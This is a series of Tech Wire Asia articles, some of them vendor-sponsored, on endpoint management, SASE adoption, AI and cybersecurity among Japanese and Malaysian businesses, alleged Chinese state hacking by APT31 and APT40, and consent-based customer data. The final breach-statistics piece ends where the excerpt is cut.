Many endpoint devices are commonly recognisable: the smartphone in your back pocket, the desktop computer or laptop. However, endpoints can also include servers – powerful computers that provide digital services to users, such as file storage, data retrieval, or commonly used applications. When all an organisation’s endpoints are added up, they can number hundreds of thousands in large enterprises.

Source: Shutterstock

Often, even discovering the existence of every endpoint is challenging, a situation that has been made more complicated since the COVID-19 pandemic and the continuing habit of working remotely. Endpoints suddenly included computers in people’s homes or personal laptops used during periods of lockdown.

Within just a couple of years from 2020, the number of endpoints using a company’s network rose sharply, and the number of cybersecurity incidents involving endpoints rose in step. Additionally, the cost of each security breach rose from $7.1m to $8.94m [PDF].

The higher number of endpoints in today’s businesses also means that more devices have at least the capability to delete, corrupt or compromise valuable data. Managing endpoints, therefore, means ensuring that devices work safely, whether from the actions of bad actors, from misuse or operators’ mistakes.

It’s clear, therefore, that managing and securing these devices needs to be at the forefront of any organisation’s cybersecurity and device management priorities. A properly managed and monitored endpoint fleet gives IT teams a clear definition of the devices it’s responsible for and a head-start on tracking down and responding to incidents caused by attackers or so-called internal threats. It also shows which devices are at greater risk of possible compromise, informing teams which endpoints need updating, patching or replacing, and with what priority.

Putting in place a rigorous endpoint management system gives organisations the best ROI of any security platform, and should be the foundation of a range of measures designed to protect the organisation’s users, digital assets and intellectual property.

Best practices in endpoint management are discussed in detail in “The Endpoint Defense Playbook: Locking Down Devices with NinjaOne“, which includes advice on how large fleet management tasks can be automated. But for the purposes of this article, let’s consider some steps that any company can take to close off many of the ways that endpoints put their owners’ digital assets at risk.

Audit
Before an IT team can know what they need to monitor, manage and protect, it has to know what devices appear on the network. An audit is therefore an unambiguous first step, although it should be noted that auditing has to be an ongoing process, as day-to-day, endpoints will change as the organisation evolves and the devices used cycle over time. A real-time network map is therefore required.

Secure access
Users, like endpoints, have to be able to prove who they are, and be granted privileges to operate on the company’s network. Passwords, two-factor authentication and single sign-on (SSO) are methods by which employees show they have the rights to be present on the network.

Zero-trust
Zero-trust is a security posture that dictates users and endpoints have no privileges whatsoever on a network by default. Then, policies grant access to applications, services, and devices on a per-case basis. In cases where no policy applies, the system reverts to zero trust or no access.

Encrypt
Encryption means that any data exchange inside or from outside the network is obfuscated and therefore immune to any eavesdropping. Data at rest should also be encrypted, so physical theft of, for instance, storage drives, will not yield any readable data by third parties.

BYOD policies
Since the emergence of the modern smartphone in the mid-00’s, users often prefer the convenience of at least occasional use of their own devices. BYOD (bring your own device) policies can determine which device types are allowed, and also stipulate which versions of software may run and operate on the network. Enacted policies will prevent insecure operating systems and software from running on users’ devices and ensure a maximum level of security among what is an unpredictable population of endpoints.

Proactive scanning
Endpoint detection and response (EDR) systems scan endpoints and log activity to flag anomalous behaviour to users or to systems administrators. Alerts can tell IT staff when action has to be taken to address apparent threats or to surface unusual patterns of behaviour that need further investigation.

Source: Shutterstock

Patch & update
Software vendors are constantly updating their code to ensure that it is as safe as possible from malicious activity. Software on endpoints should run the latest versions of all software (including the operating system) so every device does not carry at least a potential attack vector. Zero-trust policies are applicable in this respect: endpoints not fully up-to-date can be denied access or given limited privileges by default.

Remediation planning

Despite all preventative measures, every network will always suffer some security or misuse issues. It is essential that IT teams have coherent plans that can be followed when there is the possibility of data breach or corruption. Remediation planning also requires the practise of recovery procedures, so teams are aware of the steps they need to take in the event of a possible incident.

Next steps
Endpoint management and security are mutually supportive processes that together form the basis for strong IT security and data loss prevention. In very small companies, it’s possible to manually implement endpoint management on a per-device basis. But in the majority of cases, an endpoint management software platform is necessary to oversee and, where possible, automate management policies.

Creating a strong and safe IT environment for any organisation is essential for a business to operate in 2024, and it’s a subject that requires a great deal of attention. You can read in more detail about the best practices to implement endpoint management in “The Endpoint Defense Playbook: Locking Down Devices with NinjaOne“, which is available to download now.

The post The criticality of endpoint management in cybersecurity and operations appeared first on Tech Wire Asia.

Organizations and governments worldwide, including Japan, face the dual challenge of mitigating risks and embracing the rapid advancements in AI. This involves managing uncertainties while also accelerating innovation and adoption to reap the benefits of this transformative technology.

Japan’s unique position in AI

Although Japan is known for its cautious approach to risk, it is also renowned for its innovative contributions to technology, particularly in smart robotics and automotive AI. However, reports suggest that Japan’s prowess in AI-powered hardware does not equally extend to its software capabilities, making it reliant on foreign large language models for generative AI.

Japan faces unique AI development and adoption hurdles, including limited data availability and cultural attitudes towards business risk. These factors complicate the integration of AI technologies within traditional business frameworks.

A recent study by Barracuda, titled ‘SMB cyber resilience in Japan: Navigating through doubt to an AI-powered future,’ examines AI’s impact on small to medium-sized businesses (SMBs) in Japan. It reveals a mix of optimism about AI’s benefits and concerns about security, knowledge, and skill gaps.

The research underscores general optimism among smaller Japanese organizations about the positive effects of AI on business operations. The majority of these businesses anticipate that adopting AI solutions will lead to workforce reductions over the next two years—66% foresee fewer full-time employees, and 70% expect to rely less on freelancers and contractors. This trend is expected to lower costs and reduce the human resource demands on companies, though it also highlights a precarious future for workers in roles vulnerable to automation.

ARE YOUR WEB APPLICATIONS SECURE? BARRACUDA REPORTS HIGH INCIDENT AND BREACH INVOLVEMENT

Muhammad Zulhusni | 22 February, 2024

In addition to cost reduction, businesses expect AI to enhance operational efficiencies across various functions, including marketing and customer relations. Approximately 67% predict that AI tools will produce over half of their content soon, and 60% believe AI will become the primary interaction point for customers. Moreover, thanks to AI, 76% anticipate quicker and more accurate customer insights.

Strengthening cybersecurity through AI

On a broader scale, 65% of respondents are confident that AI tools can streamline their cybersecurity needs, reducing reliance on human security teams or third-party services. Given Japan’s acute shortage of cybersecurity professionals, integrating AI for automated threat detection and response is seen as essential for enhancing security across all business sizes.

Most organizations recognize the need for external assistance to fully leverage AI for business benefits. A significant majority of businesses surveyed—76%—indicate the necessity of partners for researching and exploring AI. The same proportion (77%) seek help with implementing AI solutions and managing these technologies on an ongoing basis. Security vendors and managed service providers in Japan are well-positioned to help smaller businesses exploit AI’s advantages.

The release of ChatGPT by OpenAI in November 2022 showcased the capabilities of generative AI tools in creating natural, engaging dialogues. Despite widespread attention, businesses exhibit cautious engagement with generative AI. Awareness does not equate to comprehensive understanding; 56% grasp the distinctions between generative AI and other AI types like machine learning, while 44% admit to limited or no understanding. Consequently, many Japanese companies impose restrictions on AI use due to potential risks.

Approximately 69% of businesses perceive risks with workplace generative AI usage. While 18% permit its use—6% broadly and 12% in limited team settings—62% do not officially sanction it, suggesting covert use that may heighten security risks. Concerns also include data protection (57% of respondents), the absence of regulatory frameworks (47%), and opaque AI decision processes (31%). Additionally, 13% fear AI systems being compromised by cyber attackers.

Risks of using generative AI (Source – Barracuda)

AI and cyber threat evolution

There’s notable uncertainty about AI’s role in evolving cyber threats. About 55% of businesses are unsure how AI could be utilized in email attacks, with similar uncertainty extending to denial-of-service (62%), malware (57%), API attacks (56%), and cyber espionage (55%).

Despite these uncertainties, email threats remain a prominent concern for Japanese small businesses, with 53% highlighting account takeover attacks as a top threat. This form of identity theft allows attackers to misuse accounts, potentially leading to phishing scams, data theft, and more. Other significant threats include phishing and social engineering (37%), with ransomware also critical (39% reported it as a top concern, predominantly initiated via email).

Cyber threats concerning businesses in Japan (Source – Barracuda)

Survey participants generally understand the role of AI in fortifying cyber defenses, especially in areas like email security and employee cybersecurity training. However, there’s some ambiguity about AI’s effectiveness in other domains, possibly due to these areas being less familiar to smaller enterprises.

When asked which AI-enhanced security measures would improve their organizational safety, 36% pointed to AI-enhanced email security, especially against sophisticated threats like deepfakes. Another 24% believed AI could support more tailored, frequent training programs. The benefits of AI in continuous threat intelligence and response, as performed by Security Operations Centers (SOCs), were not as clearly understood.

The survey reveals a deficiency in AI-specific practices and policies needed for responsible AI usage. While 52% of businesses conduct employee training on AI use and vulnerabilities, only 35% have formal policies dictating AI usage. Even fewer have comprehensive governance structures in place, such as legal frameworks. This indicates a lack of control and management over AI applications within businesses.

A YEAR OF HIGH-SEVERITY ATTACKS AND GROUNDBREAKING CYBERSECURITY STRATEGIES IN 2023

Muhammad Zulhusni | 5 March, 2024

The latest ICS2 Cybersecurity Workforce Study shows that Japan has nearly half a million cybersecurity professionals, a notable 23.8% increase from the previous year, contrasting with a global average of 8.7%. Despite this growth, the demand far exceeds supply, with a shortage of 110,254 professionals, marking a 97.6% increase year-over-year — significantly higher than the global average of 12.6%. This gap is unprecedented compared to other nations evaluated in the ICS2 study.

This macro perspective mirrors smaller businesses’ daily challenges, particularly with AI-driven cyber threats.

Makoto Suzuki, Regional Sales Director for Japan at Barracuda, highlights the survey’s findings: Japanese SMBs recognize AI’s benefits for enhancing business productivity but remain cautious about the cyber threats it poses. Suzuki notes, “This could hold businesses back from harnessing the full potential of AI to revolutionize business performance and competitiveness by optimizing processes, reducing costs, improving quality, and providing new insights and ideas.”

The post How Japan balances AI-driven opportunities with cybersecurity needs appeared first on Tech Wire Asia.

A change is occurring in how organisations secure their network perimeters, users, applications and data. Secure access service edge (SASE) is starting to disrupt traditional approaches to networking and security, and is giving IT professionals an opportunity to fundamentally reimagine how they design their network and security architectures.

Previously, enterprise network architecture was based on discrete silos of network and security controls, with remote access provided via virtual private networks (VPNs). These approaches are being rapidly replaced by SASE and zero-trust network access (ZTNA) architectures.

Source: Shutterstock

Getting SASE right can be a complex proposition that presents significant challenges. While major elements that make up SASE have been around in some form for at least 10 years, it is still an evolving technology.

A case study in SASE Success: India Insurance Company

As part of the research commissioned by Verizon Business to help companies cut through the noise to get a true picture of obstacles and opportunities in implementing SASE, S&P Global Market Intelligence conducted 10 in-depth interviews with decision makers and those purchasing SASE technology.

One successful SASE implementation case study was shared in an interview with a VP at one of the largest insurance companies in India, which we will refer to as “IIC” (India insurance company).

“The primary driver [for SASE] was the pandemic. Before, we had a traditional bricks-and-mortar office infrastructure. When the pandemic hit, everything was being provisioned by the company. There was no way to use ‘bring your own devices (BYOD) – only company-owned, hardened machines could be used […] which took 10-15 days to provision,” he said.

Suddenly, many users, particularly contractors, did not meet security requirements because controls were not designed for off-site workers. In response, IIC implemented a SASE project focused initially on data access, followed by applications.

“Now, we can fully support BYOD, which was the hardest problem to solve. We were forced to go with an agentless approach, through an outside portal […] new employees and contractors are now productive from day one instead of waiting for their machine to arrive,” said the respondent, an Executive Vice President and Head of Business Systems and Infrastructure at the IIC, which currently employs over 10,000 people..

The company could immediately improve the user experience, meet remote worker security and compliance requirements, and improve productivity by supporting BYOD, which enabled employees and contractors to begin work immediately.

What is driving SASE adoption?

Some compelling factors driving SASE adoption are the size and maturity of organisations. For more mature, technically sophisticated enterprises, SASE implementations are motivated more by business and digital transformation needs than technical requirements.

Common business drivers include improved business agility, cost reduction, support for hybrid work (office-based and remote workers), improved end-user experience, reduced threat impact and risk, improved compliance and competitive pressure.

Source: Shutterstock

Larger organisations, especially those with over 10,000 employees, tend to suffer from technical debt and incompatible legacy systems that slow down deployments. Conversely, smaller organisations tend to adopt solutions faster and can often source the entire SASE stack from a single vendor.

Common technical drivers include network, security, IT modernisation and simplification, and simplified management of rapidly growing networks.

Key considerations for implementing SASE

Research participants indicated a variety of deployment approaches. None indicated embarking on a “big bang” implementation: some organisations rolled SASE out to high-risk users and apps first, while others chose lower-risk users and applications.

For example, some organisations with high short term risk exposures, such as the potential for breaches or failing compliance audits, chose to solve the issue for those groups first. Others, less concerned about short-term risk, took a more conservative approach like deploying to staff already using modern cloud apps.

“It was all about basic access first to support the remote workforce. Subsequently, it was about business-critical targets and high-risk estates, with quick wins peppered in between,” said one respondent, a Regional Information Security Manager for a large Australian IT services company.

“Any users who can migrate without losing any access to unsupported apps naturally will do so. This provides a faster, better user experience that rewards the user to move to SASE. They were excited to move away from VPN and use [it] as a […] fall-back plan,” said another, a Regional CISO at a large Singapore engineering firm.

Overall SASE projects vary in duration (from initial sign-off to production) from 6-12 months to over three years. Nearly half (45%) of all respondents indicated durations of 12 months or less; another 45% fell in the 13 to 36 month range; and the remaining 10% indicated more than three years to complete a SASE implementation.

In Asia Pacific, only one-third of participants indicated that SASE was deployed as part of a digital transformation initiative, as compared with three-quarters of their counterparts in Europe.

End matters

In the next part of this article, we’ll be looking more deeply into the study’s results, and getting the thoughts of Rob Le Busque, Regional Vice President at Verizon, APAC. In the meantime, head to this page to learn from the experiences of enterprises who have already migrated to SASE, detailed in the report produced in collaboration with S&P Global Market Intelligence.

Continue your exploration of SASE adoption with Part 2 of this feature, which will cover in-depth study results and insights from Rob Le Busque. Check back in the coming weeks for the next instalment and in the meantime, you can explore the research and business impact briefs for comprehensive insights at the following links: Research | Business Impact Briefs.

The post Deploying SASE: Benchmarking your approach appeared first on Tech Wire Asia.

Malaysia is no stranger to the cybersecurity landscape, having been involved in and targeted by a significant number of cyberattacks and data leaks. These incidents raise questions about the country’s readiness to face cyber threats within this evolving cybersecurity environment.

The 2024 Cybersecurity Readiness Index for Malaysia

In Cisco’s 2024 Cybersecurity Readiness Index, it is revealed that only two percent of organizations in Malaysia are classified at the ‘Mature’ level for readiness. This classification indicates robust resilience against the myriad of modern cybersecurity risks that today’s businesses face.

This critical assessment arrives at a time when hyperconnectivity defines our era, alongside a threat landscape that is rapidly evolving. Businesses are incessantly bombarded with sophisticated cyber threats, ranging from phishing and ransomware to supply chain attacks and social engineering tactics. Despite concerted efforts to fortify defenses against these onslaughts, many organizations are burdened by their complex security frameworks, which often consist of disparate point solutions.

WHAT’S GOING ON WITH CYBER SECURITY IN MALAYSIA?

Muhammad Zulhusni | 14 July, 2023

The complications of defending against cyber threats are further amplified in today’s distributed work environment, where organizational data is dispersed across an infinite array of services, devices, applications, and user interfaces.

Yet, despite these daunting challenges, a surprising 85% of companies profess a moderate to a high level of confidence in their cybersecurity defenses, despite their actual state of preparedness. This stark disparity between perceived confidence and actual readiness points to a potentially dangerous overestimation of their cybersecurity capabilities and a failure to accurately gauge the magnitude of the threats they face.

The 2024 Cisco Cybersecurity Readiness Index undertakes a comprehensive examination of organizational preparedness against cyber threats across five critical domains: Identity intelligence, network resilience, machine trustworthiness, cloud reinforcement, and AI fortification. These domains encompass 31 distinct solutions and capabilities, evaluated through a double-masked survey of more than 8,000 security and business leaders across the globe.

2% of organizations in Malaysia are classified at the ‘Mature’ level for readiness. (Source – Cisco)

The survey’s respondents were asked about their deployment of these cybersecurity measures, classifying them into four ascending stages of readiness: Beginner, Formative, Progressive, and Mature.

Jeetu Patel, Cisco’s Executive Vice President and General Manager of Security and Collaboration, cautions against the peril of overconfidence within the organizational psyche, advocating for a strategic shift towards integrated security platforms and leveraging AI to scale defense mechanisms effectively.

The findings from the study paint a grim picture of readiness among Malaysian companies, with a mere two percent poised to effectively counter contemporary cyber threats. A significant majority find themselves at the lower echelons of cybersecurity maturity, ill-prepared for the inevitabilities of the cyber threat landscape.

Forecasting cyber risks and financial implications

Moreover, the study forecasts a high likelihood of future cybersecurity incidents and sheds light on the financial ramifications of such breaches, with some incidents costing organizations upwards of US$300,000. The reliance on multiple cybersecurity point solutions has proven counterproductive, hampering the swift detection, response, and recovery from incidents. This issue is exacerbated by the admission from a vast majority that the cumbersome management of numerous point solutions slows their security operations.

The survey also highlights the pervasive issue of unmanaged device access, critical talent shortages, and the ambitious plans of organizations to significantly bolster their IT infrastructures and cybersecurity measures in the near term. This includes a notable emphasis on upgrading existing solutions, deploying new technologies, and a considerable increase in cybersecurity budgets.

Addressing the complex challenges posed by today’s threat landscape necessitates a concerted effort from companies to accelerate their investment in security infrastructure, adopt innovative security measures, and embrace a platform-based approach to cybersecurity. This strategy is essential for enhancing network resilience, making meaningful use of AI, and bridging the significant cybersecurity skills gap.

Hana Raja, Managing Director of Cisco Malaysia, underscores the complexity of the current cybersecurity environment, pointing out the lag in cyber resilience among organizations globally, including those in Malaysia. Raja advocates for a comprehensive platform approach to cybersecurity, which promises a simplified, secure, and holistic view of an organization’s security posture, enabling businesses to better navigate and exploit the advantages of emerging technologies amid the ever-evolving threat landscape.

MALAYSIA’S CENTRAL DATABASE HUB: IS PADU A CYBERSECURITY TIMEBOMB?

Aaron Raj | 7 February, 2024

The first reading of the Cyber Security Bill 2024

Recognizing that only a small fraction of companies in Malaysia achieve a “Mature” status in cybersecurity preparedness, the Malaysian government acknowledges the critical need to bolster cybersecurity nationwide. Consequently, the Cyber Security Bill 2024 has been introduced, marking its initial reading in Parliament. Aimed at strengthening national cybersecurity, this legislative proposal was presented by Digital Minister Gobind Singh Deo on March 25th.

The Star reported that The bill is scheduled for a second reading during the ongoing session of the Dewan Rakyat and outlines a comprehensive approach to elevate cybersecurity standards. It mandates adherence to specific measures and standards for improved national security, detailing protocols for managing cybersecurity incidents that affect the country’s critical national information infrastructure.

Additionally, the legislation proposes the creation of a National Cyber Security Committee and defines the responsibilities and authority of the National Cyber Security Agency’s chief executive officer. It includes provisions for the licensing of cybersecurity service providers and establishes the role of a national critical information infrastructure sector lead.

According to the bill, the Digital Minister, following recommendations from the chief executive, may designate any government body or individual as the sector lead for national critical information infrastructure, potentially appointing multiple leads for various sectors. These appointments will be officially announced on the National Cyber Security Agency’s website.

The sector leads will be responsible for developing a code of practice and creating and updating guidelines on best practices for managing cybersecurity. The National Cyber Security Agency has stated that the proposed bill will legally empower it to define and enforce cybersecurity standards for entities deemed as National Critical Information Infrastructure. Failure to comply with these standards could result in legal repercussions.

The post Cybersecurity in Malaysia: A reality check on readiness and resilience appeared first on Tech Wire Asia.

China finds itself at the heart of global scrutiny once more. Following its recent shift in tech policy, including the move to phase out AMD and Intel microprocessors in governmental applications, serious allegations have emerged from the U.S. and the UK. Authorities in these countries have leveled charges, imposed sanctions, and accused Beijing of orchestrating a vast cyberespionage campaign, reportedly affecting millions, including lawmakers, academics, journalists, and companies, notably in the defense sector.

Termed Advanced Persistent Threat 31, or “APT31,” this hacking ensemble is characterized by officials as a branch of China’s Ministry of State Security. A broad spectrum of individuals and entities has been identified as targets, encompassing White House personnel, U.S. senators, British legislators, and international officials critical of Beijing, as reported by Reuters.

Although specific victims have not been fully disclosed, it’s clear that over the past decade, these hackers have penetrated defense contractors, dissidents, and various sectors in the U.S., such as steel, energy, and apparel. They’ve also targeted leaders in 5G and wireless technology, extending even to the spouses of prominent U.S. officials and lawmakers.

HOW 5G CONNECTIVITY AND WI-FI 7 WILL SHAPE UP IN 2024

Aaron Raj | 19 December, 2023

Deputy U.S. Attorney General Lisa Monaco stated that the operation aimed to stifle criticism of the Chinese regime, compromise government institutions, and steal trade secrets.

A recent indictment of seven alleged Chinese hackers has brought to light the magnitude of their operations, detailing breaches involving work accounts, personal emails, and more, impacting millions in the U.S. British officials have also highlighted APT31’s hacking of key UK lawmakers and have connected another group of Chinese spies to a significant breach of Britain’s electoral commission.

International reactions and repercussions on the “China hacking”

In response, Chinese officials in the UK and U.S. have dismissed these allegations as unfounded and slanderous.

Amidst these disclosures, the UK and U.S. have sanctioned individuals and entities believed to be linked to China’s state security apparatus and involved in these cyber operations.

This situation intensifies the already heightened tensions between Beijing and Washington over cybersecurity, with each side increasingly accusing the other of espionage. China has retorted with allegations of U.S. cyber intrusions into major Chinese corporations, such as Huawei Technologies.

One notable incident highlighted by U.S. prosecutors involved targeting staffers from a U.S. presidential campaign in 2020, corroborating Google’s reports of malicious emails sent to President Joe Biden’s campaign team, though no breach was confirmed.

The hacking of a significant American public opinion research firm in 2018, during the U.S. midterm elections, underscores the hackers’ strategic interest in political entities for their invaluable intelligence and data.

John Hultquist, chief analyst for U.S. cybersecurity intelligence firm Mandiant, has pointed out the substantial value political organizations offer to espionage efforts, underlining the critical insights and extensive data they provide to actors like APT31 in search of geopolitical intelligence.

The global stage of cyber warfare

The narrative has broadened beyond the initial U.S. and UK accusations against China regarding cyberespionage. The New Zealand government has also come forward, expressing its concerns to the Chinese government about a state-backed cyberattack on New Zealand’s parliament in 2021, discovered by the country’s intelligence services. This incident contributes to the intricate landscape of international cyber tensions.

This exposure of unauthorized access to New Zealand’s parliamentary systems through malicious cyber activities aligns with the allegations of cyberespionage by Britain and the U.S. against China. New Zealand and Australia have both denounced these extensive cyber operations.

New Zealand’s Foreign Minister, Winston Peters, has criticized such foreign interference as unacceptable. He highlighted that New Zealand has conveyed its concerns about cyber activities attributed to Chinese government-sponsored groups targeting democratic institutions in New Zealand and the UK to the Chinese ambassador.

The Chinese Embassy in New Zealand has not yet commented on these accusations.

We reject outright the groundless and irresponsible accusations against China on cyber attacks or intrusions, and have lodged serious démarches to New Zealand’s relevant authorities, expressing strong dissatisfaction and resolute opposition.

Cybersecurity is a global challenge.…

— Wang Xiaolong (@AmbChina2NZ) March 26, 2024

The New Zealand Communications Security Bureau (GCSB), in charge of cybersecurity and signals intelligence, has linked a state-sponsored Chinese entity, known as Advanced Persistent Threat 40 (APT40), to the malicious cyber activities against New Zealand’s parliamentary services and parliamentary counsel office in 2021. The GCSB associates APT40 with the Ministry of State Security, noting that while no sensitive or strategic information was compromised, the attackers extracted technical data, potentially enabling further intrusive activities.

According to the GCSB, a notable portion of the malicious cyber events targeting nationally significant organizations last year were traced back to state-sponsored actors, not exclusively China. The bureau also criticized similar cyber activities linked to Russia.

Judith Collins, the minister responsible for the GCSB, stated that cyberespionage efforts targeting democratic institutions are universally condemnable.

Towards a unified stance against cyber intrusions

This development follows charges, sanctions, and accusations by American and British officials against Beijing, accusing it of conducting a widespread cyberespionage campaign that allegedly affected millions globally, including lawmakers, academics, journalists, and businesses, such as defense contractors. The group behind these activities, identified as Advanced Persistent Threat 31 or “APT31,” is said to be an extension of China’s Ministry of State Security, with a broad list of global targets reported by officials from the two countries.

CHINA’S NEW TECH POLICIES CHALLENGE INTEL AND AMD IN A SHIFTING LANDSCAPE

Muhammad Zulhusni | 26 March, 2024

A joint statement from Australia’s Foreign Minister Penny Wong and Home Affairs Minister Clare O’Neil criticized the continuous cyber targeting of democratic institutions, emphasizing the adverse impact on democratic and open societies like Australia. They stated that such behavior is unacceptable and must cease.

In 2019, Australian intelligence attributed a cyberattack on its national parliament and the country’s three largest political parties before the general election to China, though the Australian government has not officially confirmed the perpetrator.

Well, it looks like the cyber saga is thickening, with China in the hot seat for allegedly orchestrating a vast network of cyberespionage that spans continents. The U.S., UK, New Zealand, and Australia are ramping up their cybersecurity defenses and calling out China’s actions on the global stage. It’s a classic case of “your move, China,” as the international community tightens its ranks against these cyber intrusions.

But what does the future hold? Well, if history has taught us anything, it’s that with every action comes a reaction. China might double down on its cybersecurity measures and retaliate, or perhaps, just perhaps, this international spotlight could usher in a new era of cyber diplomacy. In a world where technology continues to blur the lines between the possible and the impossible, who’s to say what the future might hold? One thing’s for sure: the global dialogue on cybersecurity is heating up.

The post Global concerns rise over alleged cyber hacking activities linked to China appeared first on Tech Wire Asia.

Source: Shutterstock

To understand how this situation arises, we need to distinguish between data types: first- and second-party data, for example. Plus, we should examine the concept of zero-party data. To help us demarcate data types and explore the implications of the relationship between customer experience and data, we spoke to Glenn Gore, CEO of Affinidi. (Read about the Affinidi Trust Network here and here for background.)

Defining data

Zero-party data is preference-based or intent-based and is held by the individual to represent the different online versions of themselves. Those different versions could be categorised, for instance, as an individual who is, depending on the context, an employee, a gamer, a charity worker, and a fitness fanatic.

This is the type of information that may help determine broad preferences for interaction with companies and brands. For example, someone who identifies as female in their zero-party data could be shown a women’s clothing line by default when they land on a clothing website.

First-party data is the information gathered by an organisation when an individual interacts with them. That could be a list of foodstuffs bought at a store. What’s interesting, Mr Gore told us, is that zero and first-party data are sometimes contradictory.

Source: Shutterstock

He said: “I say that I don’t want to eat sugary products; that’s zero-party data. But my shopping history says that’s an outright lie because I buy chocolate and fruit juice all the time! So now you can start seeing something really fascinating.”

In that context, a brand could show a message at checkout offering alternative, low-sugar products. That might lower their revenues, assuming diet alternatives are cheaper, but it would be a better customer experience and a net gain for the relationship.

Second-party data is information that’s shared, with approval, between the first party and another. “Let’s say I’ve engaged with a nutritionist and I’ve decided to help with the nutritional accuracy,” said Mr Gore. “I share what I buy at the supermarket. So, that data from the grocery store, which is first-party data, is shared with my new nutritionist.

“The difference here is that it’s with my consent, my knowledge. Nothing else is going to be shipped. The grocery store is not going to share the videotapes of how long I stood staring at the chocolates even though I didn’t buy any.”

Third-party data is the type of information that is collected and often sold and is “kind of the one that gets everyone in trouble.”

Mr Gore said: “This is where data that’s been collected about myself is aggregated with lots of other data sets combined and then sold without my consent, without my knowledge. To stay with that same example, my nutritionist says, ‘Well done, Glenn, you’re buying kale, you’re eating lots of healthy things. But I see that you’re not going to the gym?’ How do you know I’m not going to the gym? I never gave you access to my gym membership! I’m not going to be very happy about that. That’s the invasion of privacy that occurs.”

As awareness of data privacy among consumers grows and increasingly strict laws about data governance fall into place, third-party data not only begins to look less attractive as a concept for the individuals it’s describing but as a potential destroyer of trust and, therefore, customer experience. It’s also a burden of responsibility on organisations that hold it, as it also represents an attractive target for bad actors and legislators.

Consenting data exchange

The key to better customer experiences, and ones that are truly personalised, is the combination of zero and first-party data, which combines intent with action. Then, multiple second-party data instances form a network of consensual data sharing, building mutual trust between the consumer and other organisations.

Mr Gore sees the future of what we now call the ‘data economy’ as one where consumers can join or create their own versions of trust networks, parties with whom they consensually share and receive value in return.

The Affinidi Trust Network is the system that Affinidi is building, comprising a “duality of innovation, the two sides of the same coin.” Developers can already build the components of the Trust Network into vendors’ and service-creators’ offerings. For end-users, the arbiters of their own data, Mr Gore envisages services that will help with the minutiae of zero-party data interactions.

“They will be custodial hub managers of your data,” he said. “These custodial holders who manage how you represent and manage yourself will help you do this on your behalf. That app will be driven by a personal AI capable of sifting the many digital interactions that take place online for each user every day and remove much of the detail of personal data management which is cumbersome.

“You don’t want to wake up every morning with an app saying, ‘We just found another 60 pieces of information about yourself out there on the internet. Do you mind just cataloging those 60?’ Personal AIs will help you with cataloging on your behalf.

Source: Shutterstock

“The worst they may do is to ask about instances where there’s some conflict resolution needed. For example, ‘I’ve automatically organised these 180 different things for you, but these two look like they’re in conflict’, or ‘I know that you might be in the process of changing how you think about this. Can you just help guide me?'”

As personal data privacy issues accelerate and big tech companies work actively to discourage privacy-focused tools – Google’s intended ban on Chrome ad-blockers later this year is a fine example – solutions like the Affinidi Trust Network and the concept of Holistic Identity make increasing sense.

Consumers don’t have to subscribe to every aspect of Rana Foroohar’s ‘Don’t Be Evil‘ to feel that information about them is being misused. That’s already apparent in so-called customer experience platforms that present personalised interactions that are too all-knowing. Representations of prospects and customers derived from bought, aggregated third-party data produce ‘personalisation’ that’s inaccurate because every individual presents multiple versions of themselves online according to context.

Allowing individual users to consensually share relevant information with trusted organisations and brands is the way to build a relationship and establish trust. Those are the relationships that will endure and will produce long-term results for commercial entities. The move to consensual (and profitable) provision of customer experiences begins with becoming part of the Affinidi Trust Network, and you can read more here.

The post Data ownership and control at the heart of tomorrow’s CX appeared first on Tech Wire Asia.

In the first half of 2023, a report from CyberSecurity Malaysia reveals a concerning trend: the government sector has experienced the highest number of data breaches, while the telecommunications sector has seen the largest volume of data leaked. This data underscores the pressing challenges in protecting sensitive information across different sectors.

National and global cybersecurity challenges

By October 2023, the National Cyber Coordination and Command Centre (NC4), under the auspices of the National Cyber Security Agency, had already registered close to 3,000 cyber incidents, highlighting the increasing focus on cybersecurity matters within the nation. Adding to the concern, cybersecurity firm Surfshark placed Malaysia as the eighth most breached country in the third quarter of 2023, with nearly half a million accounts compromised.

The frequency of cyber threats became even more pronounced, with statistics showing that there have been 74,000 attacks daily throughout the year. In a particularly alarming revelation by both Kaspersky and Surfshark, the rate at which Malaysian user accounts were compromised in Q3 2023 amounted to four leaks every minute.

This data not only underscores the urgency of the cybersecurity situation but also emphasizes the importance of understanding attackers’ tactics to safeguard our people, data, and infrastructure effectively.

Shifting the focus to a global perspective, IBM’s 2024 X-Force Threat Intelligence Index unveils a similar urgency in addressing cybersecurity threats. IBM has unveiled a growing global identity crisis caused by cybercriminals increasingly exploiting user identities to infiltrate enterprises worldwide. This report draws on observations from monitoring over 150 billion security events daily across more than 130 countries.

IBM: THE FIVE TRENDS IN AI FOR 2024

Aaron Raj | 20 December, 2023

The emerging crisis is stark: cybercriminals are shifting from hacking online accounts to using readily available internet and dark web data, with AI further simplifying these breaches. This shift allows for deeper incursions into personal lives, exposing everything from daily routines to hobbies and interests.

IBM X-Force, the offensive and defensive security services branch of IBM Consulting, noted a significant shift in 2023. Cybercriminals preferred using legitimate account credentials to breach corporate networks rather than hacking, making this strategy a favorite among threat actors.

Asia-Pacific cybersecurity landscape

The 2024 X-Force Study also provides a geographical breakdown of cyber incidents, with the Asia-Pacific region being the third most impacted in 2023, accounting for 23% of global incidents handled by X-Force. This marked a change from 2021 to 2022, when Asia-Pacific was most affected. In 2023, Europe rose to the top spot, with 32% of incidents, followed by North America at 26%, Asia-Pacific at 23%, Latin America at 12%, and the Middle East and Africa at 7%.

In the Asia-Pacific, manufacturing continued to be the industry most targeted by cyber attacks for the second consecutive year, comprising 46% of incidents. Finance, insurance, and transportation industries followed, each representing 12% of incidents, and education came in third at 8%.

Phishing remained the predominant method for gaining initial access, responsible for 36% of incidents, closely followed by attacks on public-facing applications at 35%.

Phishing in action (Source – IBM)

Once inside, malware was the leading action, with 45% of attacks involving this tactic, including ransomware (17%) and info stealers (10%).

The report suggests that the return on investment (ROI) from attacking generative AI platforms isn’t significant yet. However, X-Force anticipates large-scale attacks on these technologies once a single AI gains 50% market share or the market narrows down to three or fewer competitors.

Despite a 44% drop in phishing attack volume from the previous year, phishing remains a primary method of attack, particularly as AI can refine and accelerate these attacks by nearly two days, keeping it a preferred method among cybercriminals.

The role of AI in dealing with cyber threats

Amidst these cybersecurity challenges, AI emerges as a pivotal tool in both exacerbating and combating threats. AI is now widely recognized for its utility, especially in how it has revolutionized threat detection, response times, and the protection of user identities and data flow. According to the IBM Cost of Data Breach 2023 report, organizations worldwide have saved almost US$1.8 million on data breach costs by leveraging AI and automation, compared to those that haven’t embraced these technologies.

